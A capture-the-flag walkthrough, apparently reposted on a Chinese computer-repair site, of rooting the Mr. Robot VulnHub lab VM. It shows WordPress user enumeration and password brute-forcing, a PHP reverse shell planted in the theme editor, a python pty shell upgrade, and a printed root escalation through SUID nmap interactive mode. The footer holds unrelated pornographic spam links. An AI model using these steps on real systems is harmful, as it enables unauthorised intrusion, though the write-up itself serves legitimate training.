錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
拿到主機root權限,Mr.Robot靶機實戰演練

作者: 佚名  日期:2018-06-29 19:59:07   來源: 本站整理

 前言

靶機主題來自美劇《黑客軍團》,這是一部傳達極客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑風格,這部劇的主角Eliot患有精神分裂,整部劇的情節都較為壓抑,有點類似于電影《搏擊俱樂部》中雙重人格的斗爭。
雖然有影視色彩的加成,但是劇中的黑客技術細節還是足夠真實的,起碼符合常規的入侵滲透思路,強烈推薦該劇。
本次靶機有三個flag,難度在初級到中級,非常適合新手訓練學習,不需要逆向技術,目標就是找到三個key,并且拿到主機root權限。

 
環境配置
靶機下載地址:https://www.vulnhub.com/entry/mr-robot-1,151/
我使用的是VMware,導入ova文件,NAT方式連接后靶機自動獲取IP
本次實戰:
靶機IP:192.168.128.142
攻擊機IP:192.168.128.106
 
實戰演練
nmap開路,IP發現:

端口發現,服務版本探測:
nmap -sV -O 192.168.128.142

開啟了三個端口,發現web端口:80,443


查看源碼沒有發現可用信息,用dirb跑目錄:


發現有robots.txt文件,訪問http://192.168.128.142/robots.txt

發現兩個文件,訪問發現第一個目錄里是一個密碼字典,第二個像是一個密碼哈希,這是第一個key
073403c8a58a1f80d943455fb30724b9



密碼哈希無法爆破,字典也先放著后面用,現在用nikto掃描,看看有沒有可用漏洞:

發現有wordpress服務,之前dirb掃目錄也發現了wordpress登錄頁面
http://192.168.128.142/wp-login

發現wordpress服務,用wpscan掃描網站,只有登錄頁面,并沒有發現什么可用漏洞

在登錄頁面隨便輸入之前字典中的用戶,發現可以枚舉用戶名:

用burp枚舉出了兩個用戶名:

用elloit作為用戶名,再掛上這個字典跑密碼:

跑了好久,終于跑出密碼:ER28-0652,字典實在太大了,對字典做了篩選為了截圖方便就把重新跑了一遍

接下來就是獲取權限了,登陸之后,依次點擊apperance>editor>404.php

在kali找到php-reverse-shell.php,將其覆蓋到404.php更改監聽端口,IP


攻擊機上監聽此端口,訪問http://192.168.128.142/234543658,任意不存在頁面觸發shell

執行 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 獲得一個更加穩定的shell

接下來查看靶機密碼文件:

發現沒法利用,先放一放。再看看其他目錄,找到一個密碼的md5散列.

拿出來破解:https://hashkiller.co.uk/md5-decrypter.aspx
abcdefghijklmnopqrstuvwxyz

用得到的密碼登錄robot

拿到第二個key,并且又拿到一個加密哈希,估計這個是root用戶的密碼
提升權限,但是沒有成功,只能想別的辦法
最后找到一個辦法,用nmap執行root權限

nmap產生了一個root權限的新shell


代碼如下:
daemon@linux:/$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:/$ pwd
pwd
/
robot@linux:/$ cd /home
cd /home
robot@linux:/home$ ls
ls
robot
robot@linux:/home$ cd robot
cd robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
robot@linux:~$ find / -user root -perm -4000 2>/dev/null
find / -user root -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$ /usr/local/bin/nmap —version
/usr/local/bin/nmap —version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:~$ nmap —interactive
nmap —interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h  for help
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !bash -p
!bash -p
bash-4.3# whoami
whoami
root
bash-4.3# cd /root
cd /root
bash-4.3# ls -al
ls -al
total 32
drwx——— 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw———- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r—r— 1 root root 3274 Sep 16 2015 .bashrc
drwx——— 2 root root 4096 Nov 13 2015 .cache
-rw-r—r— 1 root root 0 Nov 13 2015 firstboot_done
-r———— 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r—r— 1 root root 140 Feb 20 2014 .profile
-rw———- 1 root root 1024 Sep 16 2015 .rnd
bash-4.3# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
bash-4.3# ls
ls
firstboot_done key-3-of-3.txt
成功拿到第三個key:
04787ddef27c3dee1ee161b21670b4e4
拿到靶機root權限,game over。
 
總結
這個靶機的難度并不大,遇到的難點:
1.使用 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 可以獲得一個穩定的shell,這個在實際滲透中用處也很大
2.用了很多辦法,一直拿不到root權限,查了很多資料發現了nmap自帶的提權腳本,這個技能get
3.這個靶機只開了web端口,ssh應該也是可以觸發的,大牛們可以嘗試
4.思路就是通過web頁面漏洞拿下了整個主機,wp提權思路也很多,大家也可以換思路滲透
 


熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲爆乳精品无码一区二区| 亚洲AV综合色区无码一区爱AV| 无码人妻精品丰满熟妇区| 无码精品一区二区三区免费视频| 麻豆AV无码精品一区二区| 无码少妇丰满熟妇一区二区| 亚洲午夜国产精品无码| 国产AV无码专区亚洲AV麻豆丫| 狠狠噜天天噜日日噜无码 | 精品久久久无码人妻字幂| 不卡无码人妻一区三区音频| 亚洲精品无码少妇30P| 久久人妻av无码中文专区| 最新高清无码专区| 无码A级毛片日韩精品| 亚洲AV无码国产一区二区三区| 亚洲乱码无码永久不卡在线| 精品人妻无码一区二区三区蜜桃一| 亚洲va无码专区国产乱码| 亚洲av无码天堂一区二区三区| 亚洲AV无码片一区二区三区| 老子午夜精品无码| 色欲A∨无码蜜臀AV免费播| 亚洲精品无码久久久久去q| 精品国产毛片一区二区无码| 妖精色AV无码国产在线看| 人妻少妇精品无码专区动漫| 无码人妻丰满熟妇啪啪网站牛牛| 少妇人妻无码精品视频| 午夜不卡久久精品无码免费| 亚洲午夜国产精品无码老牛影视| 中文字幕av无码专区第一页| 精品一区二区无码AV| 亚洲AV无码一区二区三区国产| 国产精品无码素人福利免费| 无码毛片一区二区三区视频免费播放| 国产精品亚洲专区无码不卡| 成人无码一区二区三区| 一本加勒比HEZYO无码人妻 | 黄桃AV无码免费一区二区三区| 国产av无码专区亚洲国产精品|